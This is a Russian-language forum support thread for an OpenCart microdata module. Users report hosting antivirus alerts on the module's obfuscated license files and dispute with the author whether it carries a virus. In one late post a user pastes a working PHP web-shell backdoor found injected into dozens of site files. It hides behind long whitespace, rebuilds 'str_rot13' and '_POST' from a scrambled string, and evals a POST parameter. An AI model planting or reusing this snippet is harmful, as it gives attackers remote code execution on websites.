Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Recommended Posts

Здравствуйте.

Микроразметка для статей в версиях 1.5.x.x есть?

Здравствуйте. Нет, для статей - нет.

Надіслати
Поділитися на інших сайтах

Здравствуйте, купил модуль, не могу отправить письмо с просьбой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь.

Странно что в ЛС не можете написать. Я вам в скайпе ответил.

Надіслати

Спасибо, ключ получил, но нужна ваша помощь, так как не все работает.

Ящик почистил немного, так что можете писать в личку (ну или в Skype)

Надіслати

• 3 weeks later...

В архиве вирус??

Здравствуйте!
Вас приветствует Регистратор доменных имён REG.RU!

Вы являетесь владельцем услуги хостинга u00ХХХХХХ .
Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.

Наши рекомендации по решению проблемы:
https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhen

Результат проверки антивируса Virusdie:
{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php
{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php

--
С уважением,
Регистратор доменных имён REG.RU

Надіслати

В архиве вирус??

не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля.
Надіслати

не знаю как в данном конкретном случае, но вообще вирусдай сработывает практически на любой зашифрованный код, тут шифровка используется для защиты модуля.

Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование)

Надіслати

• 2 weeks later...

Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже.

До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога

Надіслати

Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже.

До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога

Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал.

Надіслати

Модуль микроразметки перекашивает работу модуля Пав Блога

Об этом вобще речи не шло. Впервые от вас это слышу.

P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь.

Змінено користувачем DariyGRAY
Надіслати

Об этом вобще речи не шло. Впервые от вас это слышу.

P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь.

Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля.

Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё!

По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! 

Надіслати

• 2 months later...

Я не понял, модуль обновился или нет? Появилось сообщение об обновлении...

Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление)

Надіслати

Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть.

Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:)

Надіслати

Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :)

Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд!

Надіслати

Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд!

Могу. Имя домена в личку или Skype напишите.

Надіслати

• 3 weeks later...

Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде.

Не могу не задать два вопроса: правда ли про вирус

и как обновить уже купленный модуль?

Надіслати

У меня стоит  данный модуль . хостер шлет каждый день письма,  Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда .  по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!!  

Звонил в тех поддержку  хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !!

По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это  происходит не по вине модуля. 

Пора бы  исходники сюда выложить - если модуль стал бесплатным.

Здравствуйте!

Вы являетесь клиентом SpaceWeb.
Ваш логин:

В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.
Ниже приведены пути к найденным файлам, а также их описание:

/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL

Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет."

Надіслати

У меня стоит  данный модуль . хостер шлет каждый день письма,  Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда .  по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!!  

Звонил в тех поддержку  хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !!

По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это  происходит не по вине модуля. 

Пора бы  исходники сюда выложить - если модуль стал бесплатным.

" отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите.

А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус.

И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают.

А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), ​так что не советую связываться!

Надіслати

Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php                                                                                                                                                                                                                                                                            $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?>

И это что совпадение ???? 

Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр   Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп.

Жалко . Деньги отдал -проблемы получил.

Надіслати

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.